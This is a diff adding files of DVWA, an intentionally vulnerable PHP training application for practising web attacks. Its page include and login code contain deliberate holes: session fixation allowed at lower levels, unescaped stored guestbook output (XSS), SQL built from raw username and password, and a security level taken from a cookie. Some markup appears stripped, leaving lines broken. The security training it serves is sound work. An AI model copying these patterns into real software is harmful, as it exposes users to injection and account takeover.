'UTF-8'); + } + + protected static function striAtStart($string, $needle) + { + $len = strlen($needle); + + if ($len > strlen($string)) + { + return false; + } + else + { + return strtolower(substr($string, 0, $len)) === strtolower($needle); + } + } + + static function instance($name = 'default') + { + if (isset(self::$instances[$name])) + { + return self::$instances[$name]; + } + + $instance = new static(); + + self::$instances[$name] = $instance; + + return $instance; + } + + private static $instances = array(); + + # + # Fields + # + + protected $DefinitionData; + + # + # Read-Only + + protected $specialCharacters = array( + '\\', '`', '*', '_', '{', '}', '[', ']', '(', ')', '>', '#', '+', '-', '.', '!', '|', '~' + ); + + protected $StrongRegex = array( + '*' => '/^[*]{2}((?:\\\\\*|[^*]|[*][^*]*+[*])+?)[*]{2}(?![*])/s', + '_' => '/^__((?:\\\\_|[^_]|_[^_]*+_)+?)__(?!_)/us', + ); + + protected $EmRegex = array( + '*' => '/^[*]((?:\\\\\*|[^*]|[*][*][^*]+?[*][*])+?)[*](?![*])/s', + '_' => '/^_((?:\\\\_|[^_]|__[^_]*__)+?)_(?!_)\b/us', + ); + + protected $regexHtmlAttribute = '[a-zA-Z_:][\w:.-]*+(?:\s*+=\s*+(?:[^"\'=<>`\s]+|"[^"]*+"|\'[^\']*+\'))?+'; + + protected $voidElements = array( + 'area', 'base', 'br', 'col', 'command', 'embed', 'hr', 'img', 'input', 'link', 'meta', 'param', 'source', + ); + + protected $textLevelElements = array( + 'a', 'br', 'bdo', 'abbr', 'blink', 'nextid', 'acronym', 'basefont', + 'b', 'em', 'big', 'cite', 'small', 'spacer', 'listing', + 'i', 'rp', 'del', 'code', 'strike', 'marquee', + 'q', 'rt', 'ins', 'font', 'strong', + 's', 'tt', 'kbd', 'mark', + 'u', 'xm', 'sub', 'nobr', + 'sup', 'ruby', + 'var', 'span', + 'wbr', 'time', + ); +} diff --git a/DVWA/dvwa/includes/dvwaPage.inc.php b/DVWA/dvwa/includes/dvwaPage.inc.php new file mode 100644 index 00000000..e33b7afb --- /dev/null +++ b/DVWA/dvwa/includes/dvwaPage.inc.php @@ -0,0 +1,691 @@ + $maxlifetime, + 'path' => '/', + 'domain' => $domain, + 'secure' => $secure, + 'httponly' => $httponly, + 'samesite' => $samesite + ]); + + /* + * We need to force a new Set-Cookie header with the updated flags by updating + * the session id, either regenerating it or setting it to a value, because + * session_start() might not generate a Set-Cookie header if a cookie already + * exists. + * + * For impossible security level, we regenerate the session id, PHP will + * generate a new random id. This is good security practice because it + * prevents the reuse of a previous unauthenticated id that an attacker + * might have knowledge of (aka session fixation attack). + * + * For lower levels, we want to allow session fixation attacks, so if an id + * already exists, we don't want it to change after authentication. We thus + * set the id to its previous value using session_id(), which will force + * the Set-Cookie header. + */ + if ($security_level == 'impossible') { + session_start(); + session_regenerate_id(); // force a new id to be generated + } + else { + if (isset($_COOKIE[session_name()])) // if a session id already exists + session_id($_COOKIE[session_name()]); // we keep the same id + session_start(); // otherwise a new one will be generated here + } +} + +if (array_key_exists ("Login", $_POST) && $_POST['Login'] == "Login") { + dvwa_start_session(); +} else { + if (!session_id()) { + session_start(); + } +} + +if (!array_key_exists ("default_locale", $_DVWA)) { + $_DVWA[ 'default_locale' ] = "en"; +} + +dvwaLocaleSet( $_DVWA[ 'default_locale' ] ); + +// Start session functions -- + +function &dvwaSessionGrab() { + if( !isset( $_SESSION[ 'dvwa' ] ) ) { + $_SESSION[ 'dvwa' ] = array(); + } + return $_SESSION[ 'dvwa' ]; +} + + +function dvwaPageStartup( $pActions ) { + if (in_array('authenticated', $pActions)) { + if( !dvwaIsLoggedIn()) { + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'login.php' ); + } + } +} + +function dvwaLogin( $pUsername ) { + $dvwaSession =& dvwaSessionGrab(); + $dvwaSession[ 'username' ] = $pUsername; +} + + +function dvwaIsLoggedIn() { + global $_DVWA; + + if (array_key_exists("disable_authentication", $_DVWA) && $_DVWA['disable_authentication']) { + return true; + } + $dvwaSession =& dvwaSessionGrab(); + return isset( $dvwaSession[ 'username' ] ); +} + + +function dvwaLogout() { + $dvwaSession =& dvwaSessionGrab(); + unset( $dvwaSession[ 'username' ] ); +} + + +function dvwaPageReload() { + if ( array_key_exists( 'HTTP_X_FORWARDED_PREFIX' , $_SERVER )) { + dvwaRedirect( $_SERVER[ 'HTTP_X_FORWARDED_PREFIX' ] . $_SERVER[ 'PHP_SELF' ] ); + } + else { + dvwaRedirect( $_SERVER[ 'PHP_SELF' ] ); + } +} + +function dvwaCurrentUser() { + $dvwaSession =& dvwaSessionGrab(); + return ( isset( $dvwaSession[ 'username' ]) ? $dvwaSession[ 'username' ] : 'Unknown') ; +} + +// -- END (Session functions) + +function &dvwaPageNewGrab() { + $returnArray = array( + 'title' => 'Damn Vulnerable Web Application (DVWA)', + 'title_separator' => ' :: ', + 'body' => '', + 'page_id' => '', + 'help_button' => '', + 'source_button' => '', + ); + return $returnArray; +} + + +function dvwaThemeGet() { + if (isset($_COOKIE['theme'])) { + return $_COOKIE[ 'theme' ]; + } + return 'light'; +} + + +function dvwaSecurityLevelGet() { + global $_DVWA; + + // If there is a security cookie, that takes priority. + if (isset($_COOKIE['security'])) { + return $_COOKIE[ 'security' ]; + } + + // If not, check to see if authentication is disabled, if it is, use + // the default security level. + if (array_key_exists("disable_authentication", $_DVWA) && $_DVWA['disable_authentication']) { + return $_DVWA[ 'default_security_level' ]; + } + + // Worse case, set the level to impossible. + return 'impossible'; +} + + +function dvwaSecurityLevelSet( $pSecurityLevel ) { + if( $pSecurityLevel == 'impossible' ) { + $httponly = true; + } + else { + $httponly = false; + } + + setcookie( 'security', $pSecurityLevel, 0, "/", "", false, $httponly ); + $_COOKIE['security'] = $pSecurityLevel; +} + +function dvwaLocaleGet() { + $dvwaSession =& dvwaSessionGrab(); + return $dvwaSession[ 'locale' ]; +} + +function dvwaSQLiDBGet() { + global $_DVWA; + return $_DVWA['SQLI_DB']; +} + +function dvwaLocaleSet( $pLocale ) { + $dvwaSession =& dvwaSessionGrab(); + $locales = array('en', 'zh'); + if( in_array( $pLocale, $locales) ) { + $dvwaSession[ 'locale' ] = $pLocale; + } else { + $dvwaSession[ 'locale' ] = 'en'; + } +} + +// Start message functions -- + +function dvwaMessagePush( $pMessage ) { + $dvwaSession =& dvwaSessionGrab(); + if( !isset( $dvwaSession[ 'messages' ] ) ) { + $dvwaSession[ 'messages' ] = array(); + } + $dvwaSession[ 'messages' ][] = $pMessage; +} + + +function dvwaMessagePop() { + $dvwaSession =& dvwaSessionGrab(); + if( !isset( $dvwaSession[ 'messages' ] ) || count( $dvwaSession[ 'messages' ] ) == 0 ) { + return false; + } + return array_shift( $dvwaSession[ 'messages' ] ); +} + + +function messagesPopAllToHtml() { + $messagesHtml = ''; + while( $message = dvwaMessagePop() ) { // TODO- sharpen! + $messagesHtml .= ""; + } + + return $messagesHtml; +} + +// --END (message functions) + +function dvwaHtmlEcho( $pPage ) { + $menuBlocks = array(); + + $menuBlocks[ 'home' ] = array(); + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'home' ][] = array( 'id' => 'home', 'name' => 'Home', 'url' => '.' ); + $menuBlocks[ 'home' ][] = array( 'id' => 'instructions', 'name' => 'Instructions', 'url' => 'instructions.php' ); + $menuBlocks[ 'home' ][] = array( 'id' => 'setup', 'name' => 'Setup / Reset DB', 'url' => 'setup.php' ); + } + else { + $menuBlocks[ 'home' ][] = array( 'id' => 'setup', 'name' => 'Setup DVWA', 'url' => 'setup.php' ); + $menuBlocks[ 'home' ][] = array( 'id' => 'instructions', 'name' => 'Instructions', 'url' => 'instructions.php' ); + } + + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'vulnerabilities' ] = array(); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'weak_id', 'name' => 'Weak Session IDs', 'url' => 'vulnerabilities/weak_id/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_d', 'name' => 'XSS (DOM)', 'url' => 'vulnerabilities/xss_d/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csp', 'name' => 'CSP Bypass', 'url' => 'vulnerabilities/csp/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'javascript', 'name' => 'JavaScript', 'url' => 'vulnerabilities/javascript/' ); + if (dvwaCurrentUser() == "admin") { + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'authbypass', 'name' => 'Authorisation Bypass', 'url' => 'vulnerabilities/authbypass/' ); + } + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'open_redirect', 'name' => 'Open HTTP Redirect', 'url' => 'vulnerabilities/open_redirect/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'encryption', 'name' => 'Cryptography', 'url' => 'vulnerabilities/cryptography/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'api', 'name' => 'API', 'url' => 'vulnerabilities/api/' ); + } + + $menuBlocks[ 'meta' ] = array(); + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'meta' ][] = array( 'id' => 'security', 'name' => 'DVWA Security', 'url' => 'security.php' ); + $menuBlocks[ 'meta' ][] = array( 'id' => 'phpinfo', 'name' => 'PHP Info', 'url' => 'phpinfo.php' ); + } + $menuBlocks[ 'meta' ][] = array( 'id' => 'about', 'name' => 'About', 'url' => 'about.php' ); + + if( dvwaIsLoggedIn() ) { + $menuBlocks[ 'logout' ] = array(); + $menuBlocks[ 'logout' ][] = array( 'id' => 'logout', 'name' => 'Logout', 'url' => 'logout.php' ); + } + + $menuHtml = ''; + + foreach( $menuBlocks as $menuBlock ) { + $menuBlockHtml = ''; + foreach( $menuBlock as $menuItem ) { + $selectedClass = ( $menuItem[ 'id' ] == $pPage[ 'page_id' ] ) ? 'selected' : ''; + $fixedUrl = DVWA_WEB_PAGE_TO_ROOT.$menuItem[ 'url' ]; + $menuBlockHtml .= "
{$messagesHtml}
";
+ }
+
+ $systemInfoHtml = "";
+ if( dvwaIsLoggedIn() )
+ $systemInfoHtml = "{$userInfoHtml}
{$securityLevelHtml}
{$localeHtml}
{$sqliDbHtml}
";
+ if( $pPage[ 'source_button' ] ) {
+ $systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] ) . " $systemInfoHtml";
+ }
+ if( $pPage[ 'help_button' ] ) {
+ $systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] ) . " $systemInfoHtml";
+ }
+
+ // Send Headers + main HTML code
+ Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1
+ Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...
+ Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past
+
+ echo "
+
+
+
+
+
+
+ {$securityLevelHtml}
{$localeHtml}
{$sqliDbHtml}
+
+
+
+
+
+";
+}
+
+
+function dvwaHelpHtmlEcho( $pPage ) {
+ // Send Headers
+ Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1
+ Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...
+ Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past
+
+ echo "
+
+
+
+
+
+
+
+
+
+ ![\"Damn](\"")
+
+
+
+
+
+
+
+
+
+ {$pPage[ 'body' ]}
+
+ {$messagesHtml} + +
+
+ + {$messagesHtml} + +
+
+
+
+ {$systemInfoHtml}
+
+
+
+
+
+
+ {$pPage[ 'body' ]}
+
+
+
+
+
+";
+}
+
+
+function dvwaSourceHtmlEcho( $pPage ) {
+ // Send Headers
+ Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1
+ Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...
+ Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past
+
+ echo "
+
+
+
+
+
+
+
+
+
+ {$pPage[ 'body' ]}
+
+
+
+
+
+";
+}
+
+// To be used on all external links --
+function dvwaExternalLinkUrlGet( $pLink,$text=null ) {
+ if(is_null( $text ) || $text == "") {
+ return '' . $pLink . '';
+ }
+ else {
+ return '' . $text . '';
+ }
+}
+// -- END ( external links)
+
+function dvwaButtonHelpHtmlGet( $pId ) {
+ $security = dvwaSecurityLevelGet();
+ $locale = dvwaLocaleGet();
+ return "";
+}
+
+
+function dvwaButtonSourceHtmlGet( $pId ) {
+ $security = dvwaSecurityLevelGet();
+ return "";
+}
+
+
+// Database Management --
+
+if( $DBMS == 'MySQL' ) {
+ $DBMS = htmlspecialchars(strip_tags( $DBMS ));
+}
+elseif( $DBMS == 'PGSQL' ) {
+ $DBMS = htmlspecialchars(strip_tags( $DBMS ));
+}
+else {
+ $DBMS = "No DBMS selected.";
+}
+
+function dvwaDatabaseConnect() {
+ global $_DVWA;
+ global $DBMS;
+ //global $DBMS_connError;
+ global $db;
+ global $sqlite_db_connection;
+
+ if( $DBMS == 'MySQL' ) {
+ if( !@($GLOBALS["___mysqli_ston"] = mysqli_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ], "", $_DVWA[ 'db_port' ] ))
+ || !@((bool)mysqli_query($GLOBALS["___mysqli_ston"], "USE " . $_DVWA[ 'db_database' ])) ) {
+ //die( $DBMS_connError );
+ dvwaLogout();
+ dvwaMessagePush( 'Unable to connect to the database.' . mysqli_error($GLOBALS["___mysqli_ston"])); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); + } + // MySQL PDO Prepared Statements (for impossible levels) + $db = new PDO('mysql:host=' . $_DVWA[ 'db_server' ].';dbname=' . $_DVWA[ 'db_database' ].';port=' . $_DVWA['db_port'] . ';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]); + $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); + $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); + } + elseif( $DBMS == 'PGSQL' ) { + //$dbconn = pg_connect("host={$_DVWA[ 'db_server' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ])}" + //or die( $DBMS_connError ); + dvwaMessagePush( 'PostgreSQL is not currently supported.' ); + dvwaPageReload(); + } + else { + die ( "Unknown {$DBMS} selected." ); + } + + if ($_DVWA['SQLI_DB'] == SQLITE) { + $location = DVWA_WEB_PAGE_TO_ROOT . "database/" . $_DVWA['SQLITE_DB']; + $sqlite_db_connection = new SQLite3($location); + $sqlite_db_connection->enableExceptions(true); + # print "sqlite db setup"; + } +} + +// -- END (Database Management) + + +function dvwaRedirect( $pLocation ) { + session_commit(); + header( "Location: {$pLocation}" ); + exit; +} + +// XSS Stored guestbook function -- +function dvwaGuestbook() { + $query = "SELECT name, comment FROM guestbook"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); + + $guestbook = ''; + + while( $row = mysqli_fetch_row( $result ) ) { + if( dvwaSecurityLevelGet() == 'impossible' ) { + $name = htmlspecialchars( $row[0] ); + $comment = htmlspecialchars( $row[1] ); + } + else { + $name = $row[0]; + $comment = $row[1]; + } + + $guestbook .= "
Name: {$name}
" . "Message: {$comment}
\n";
+ }
+ return $guestbook;
+}
+// -- END (XSS Stored guestbook)
+
+
+// Token functions --
+function checkToken( $user_token, $session_token, $returnURL ) { # Validate the given (CSRF) token
+ global $_DVWA;
+
+ if (array_key_exists("disable_authentication", $_DVWA) && $_DVWA['disable_authentication']) {
+ return true;
+ }
+
+ if( $user_token !== $session_token || !isset( $session_token ) ) {
+ dvwaMessagePush( 'CSRF token is incorrect' );
+ dvwaRedirect( $returnURL );
+ }
+}
+
+function generateSessionToken() { # Generate a brand new (CSRF) token
+ if( isset( $_SESSION[ 'session_token' ] ) ) {
+ destroySessionToken();
+ }
+ $_SESSION[ 'session_token' ] = md5( uniqid() );
+}
+
+function destroySessionToken() { # Destroy any session with the name 'session_token'
+ unset( $_SESSION[ 'session_token' ] );
+}
+
+function tokenField() { # Return a field for the (CSRF) token
+ return "";
+}
+// -- END (Token functions)
+
+
+// Setup Functions --
+$PHPUploadPath = realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . "hackable" . DIRECTORY_SEPARATOR . "uploads" ) . DIRECTORY_SEPARATOR;
+$PHPCONFIGPath = realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . "config");
+
+
+$phpDisplayErrors = 'PHP function display_errors: Enabled' : 'failure">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure)
+$phpDisplayStartupErrors = 'PHP function display_startup_errors: Enabled' : 'failure">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure)
+$phpDisplayErrors = 'PHP function display_errors: Enabled' : 'failure">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure)
+$phpURLInclude = 'PHP function allow_url_include: Enabled' : 'failure">Disabled' ) . ''; // RFI
+$phpURLFopen = 'PHP function allow_url_fopen: Enabled' : 'failure">Disabled' ) . ''; // RFI
+$phpGD = 'PHP module gd: Installed' : 'failure">Missing - Only an issue if you want to play with captchas' ) . ''; // File Upload
+$phpMySQL = 'PHP module mysql: Installed' : 'failure">Missing' ) . ''; // Core DVWA
+$phpPDO = 'PHP module pdo_mysql: Installed' : 'failure">Missing' ) . ''; // SQLi
+$DVWARecaptcha = 'reCAPTCHA key: ' . $_DVWA[ 'recaptcha_public_key' ] : 'failure">Missing' ) . '';
+
+$DVWAUploadsWrite = 'Writable folder ' . $PHPUploadPath . ': Yes' : 'failure">No' ) . ''; // File Upload
+$bakWritable = 'Writable folder ' . $PHPCONFIGPath . ': Yes' : 'failure">No' ) . ''; // config.php.bak check // File Upload
+
+$DVWAOS = 'Operating system: ' . ( strtoupper( substr (PHP_OS, 0, 3)) === 'WIN' ? 'Windows' : '*nix' ) . '';
+$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF
+
+$MYSQL_USER = 'Database username: ' . $_DVWA[ 'db_user' ] . '';
+$MYSQL_PASS = 'Database password: ' . ( ($_DVWA[ 'db_password' ] != "" ) ? '******' : '*blank*' ) . '';
+$MYSQL_DB = 'Database database: ' . $_DVWA[ 'db_database' ] . '';
+$MYSQL_SERVER = 'Database host: ' . $_DVWA[ 'db_server' ] . '';
+$MYSQL_PORT = 'Database port: ' . $_DVWA[ 'db_port' ] . '';
+// -- END (Setup Functions)
+
+?>
diff --git a/DVWA/dvwa/js/add_event_listeners.js b/DVWA/dvwa/js/add_event_listeners.js
new file mode 100644
index 00000000..5d9a82fd
--- /dev/null
+++ b/DVWA/dvwa/js/add_event_listeners.js
@@ -0,0 +1,24 @@
+// These functions need to be called after the content they reference
+// has been added to the page otherwise they will fail.
+
+function addEventListeners() {
+ var source_button = document.getElementById ("source_button");
+
+ if (source_button) {
+ source_button.addEventListener("click", function() {
+ var url=source_button.dataset.sourceUrl;
+ popUp (url);
+ });
+ }
+
+ var help_button = document.getElementById ("help_button");
+
+ if (help_button) {
+ help_button.addEventListener("click", function() {
+ var url=help_button.dataset.helpUrl;
+ popUp (url);
+ });
+ }
+}
+
+addEventListeners();
diff --git a/DVWA/dvwa/js/dvwaPage.js b/DVWA/dvwa/js/dvwaPage.js
new file mode 100644
index 00000000..92fc8639
--- /dev/null
+++ b/DVWA/dvwa/js/dvwaPage.js
@@ -0,0 +1,45 @@
+/* Help popup */
+
+function popUp(URL) {
+ day = new Date();
+ id = day.getTime();
+ window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,height=300,left=540,top=250');
+ //eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,height=300,left=540,top=250');");
+}
+
+/* Form validation */
+
+function validate_required(field,alerttxt)
+{
+with (field) {
+ if (value==null||value=="") {
+ alert(alerttxt);return false;
+ }
+ else {
+ return true;
+ }
+ }
+}
+
+function validateGuestbookForm(thisform) {
+with (thisform) {
+
+ // Guestbook form
+ if (validate_required(txtName,"Name can not be empty.")==false)
+ {txtName.focus();return false;}
+
+ if (validate_required(mtxMessage,"Message can not be empty.")==false)
+ {mtxMessage.focus();return false;}
+
+ }
+}
+
+function confirmClearGuestbook() {
+ return confirm("Are you sure you want to clear the guestbook?");
+}
+
+function toggleTheme() {
+ document.body.classList.toggle('dark');
+ const theme = document.body.classList.contains('dark') ? 'dark' : 'light';
+ document.cookie = "theme=" + theme + "; path=/";
+}
diff --git a/DVWA/external/recaptcha/recaptchalib.php b/DVWA/external/recaptcha/recaptchalib.php
new file mode 100644
index 00000000..eef48184
--- /dev/null
+++ b/DVWA/external/recaptcha/recaptchalib.php
@@ -0,0 +1,45 @@
+ $key,
+ 'response' => urlencode($response),
+ 'remoteip' => urlencode($_SERVER['REMOTE_ADDR'])
+ );
+
+ $opt = array(
+ 'http' => array(
+ 'header' => "Content-type: application/x-www-form-urlencoded\r\n",
+ 'method' => 'POST',
+ 'content' => http_build_query($dat)
+ )
+ );
+
+ $context = stream_context_create($opt);
+ $result = file_get_contents($url, false, $context);
+
+ return json_decode($result)->success;
+
+ } catch (Exception $e) {
+ return null;
+ }
+
+}
+
+function recaptcha_get_html($pubKey){
+ return "
+
+ " . "Message: {$comment}
+ "; +} + +?> diff --git a/DVWA/favicon.ico b/DVWA/favicon.ico new file mode 100644 index 00000000..d8a08d70 Binary files /dev/null and b/DVWA/favicon.ico differ diff --git a/DVWA/hackable/flags/fi.php b/DVWA/hackable/flags/fi.php new file mode 100644 index 00000000..71e0ffee --- /dev/null +++ b/DVWA/hackable/flags/fi.php @@ -0,0 +1,24 @@ + + +1.) Bond. James Bond + +
\n"; + +$line3 = "3.) Romeo, Romeo! Wherefore art thou Romeo?"; +$line3 = "--LINE HIDDEN ;)--"; +echo $line3 . "\n\n
\n"; + +$line4 = "NC4pI" . "FRoZSBwb29s" . "IG9uIH" . "RoZSByb29mIG1" . "1c3QgaGF" . "2ZSBh" . "IGxlY" . "Wsu"; +echo base64_decode( $line4 ); + +?> + + diff --git a/DVWA/hackable/uploads/dvwa_email.png b/DVWA/hackable/uploads/dvwa_email.png new file mode 100644 index 00000000..22af62f2 Binary files /dev/null and b/DVWA/hackable/uploads/dvwa_email.png differ diff --git a/DVWA/hackable/users/1337.jpg b/DVWA/hackable/users/1337.jpg new file mode 100644 index 00000000..5183ae37 Binary files /dev/null and b/DVWA/hackable/users/1337.jpg differ diff --git a/DVWA/hackable/users/admin.jpg b/DVWA/hackable/users/admin.jpg new file mode 100644 index 00000000..fb7a9c73 Binary files /dev/null and b/DVWA/hackable/users/admin.jpg differ diff --git a/DVWA/hackable/users/gordonb.jpg b/DVWA/hackable/users/gordonb.jpg new file mode 100644 index 00000000..541dd8c7 Binary files /dev/null and b/DVWA/hackable/users/gordonb.jpg differ diff --git a/DVWA/hackable/users/pablo.jpg b/DVWA/hackable/users/pablo.jpg new file mode 100644 index 00000000..0a9549db Binary files /dev/null and b/DVWA/hackable/users/pablo.jpg differ diff --git a/DVWA/hackable/users/smithy.jpg b/DVWA/hackable/users/smithy.jpg new file mode 100644 index 00000000..1b824c76 Binary files /dev/null and b/DVWA/hackable/users/smithy.jpg differ diff --git a/DVWA/index.php b/DVWA/index.php new file mode 100644 index 00000000..9da6f6e7 --- /dev/null +++ b/DVWA/index.php @@ -0,0 +1,47 @@ + +
Welcome to Damn Vulnerable Web Application!
+Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.
+The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficultly, with a simple straightforward interface.
++
+ +
General Instructions
+It is up to the user how they approach DVWA. Either by working through every module at a fixed level, or selecting any module and working up to reach the highest level they can before moving onto the next one. There is not a fixed object to complete a module; however users should feel that they have successfully exploited the system as best as they possible could by using that particular vulnerability.
+Please note, there are both documented and undocumented vulnerabilities with this software. This is intentional. You are encouraged to try and discover as many issues as possible.
+There is a help button at the bottom of each page, which allows you to view hints & tips for that vulnerability. There are also additional links for further background reading, which relates to that security issue.
++
+ +
WARNING!
+Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as " . dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' ) . " or " . dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' ) . "), which is set to NAT networking mode. Inside a guest machine, you can download and install " . dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/','XAMPP' ) . " for the web server and database.
++
Disclaimer
+We do not take responsibility for the way in which any one uses this application (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.
++
+ +
More Training Resources
+DVWA aims to cover the most commonly seen vulnerabilities found in today's web applications. However there are plenty of other issues with web applications. Should you wish to explore any additional attack vectors, or want more difficult challenges, you may wish to look into the following other projects:
+-
+
- " . dvwaExternalLinkUrlGet( 'https://github.com/webpwnized/mutillidae', 'Mutillidae') . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-vulnerable-web-applications-directory', 'OWASP Vulnerable Web Applications Directory') . " +
+
+"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/instructions.php b/DVWA/instructions.php new file mode 100644 index 00000000..18e8d4dc --- /dev/null +++ b/DVWA/instructions.php @@ -0,0 +1,67 @@ + array( 'type' => 'markdown', 'legend' => 'Read Me', 'file' => 'README.md' ), + 'PDF' => array( 'type' => 'html' ,'legend' => 'PDF Guide', 'file' => 'docs/pdf.html' ), + 'changelog' => array( 'type' => 'markdown', 'legend' => 'Change Log', 'file' => 'CHANGELOG.md' ), + 'copying' => array( 'type' => 'markdown', 'legend' => 'Copying', 'file' => 'COPYING.txt' ), +); + +$selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : ''; +if( !array_key_exists( $selectedDocId, $docs ) ) { + $selectedDocId = 'readme'; +} +$readFile = $docs[ $selectedDocId ][ 'file' ]; + +$instructions = file_get_contents( DVWA_WEB_PAGE_TO_ROOT.$readFile ); + +if ($docs[ $selectedDocId ]['type'] == "markdown") { + $parsedown = new ParseDown(); + $instructions = $parsedown->text($instructions); +} + +/* +function urlReplace( $matches ) { + return dvwaExternalLinkUrlGet( $matches[1] ); +} + +// Make links and obfuscate the referer... +$instructions = preg_replace_callback( + '/((http|https|ftp):\/\/([[:alnum:]|.|\/|?|=]+))/', + 'urlReplace', + $instructions +); + +$instructions = nl2br( $instructions ); +*/ +$docMenuHtml = ''; +foreach( array_keys( $docs ) as $docId ) { + $selectedClass = ( $docId == $selectedDocId ) ? ' selected' : ''; + $docMenuHtml .= ""; +} +$docMenuHtml = ""; + +$page[ 'body' ] .= " +
+
";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/login.php b/DVWA/login.php
new file mode 100644
index 00000000..c8c7268f
--- /dev/null
+++ b/DVWA/login.php
@@ -0,0 +1,137 @@
+Need to run 'setup.php'." );
+ dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' );
+ }
+
+ $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
+ $result = @mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( 'Instructions
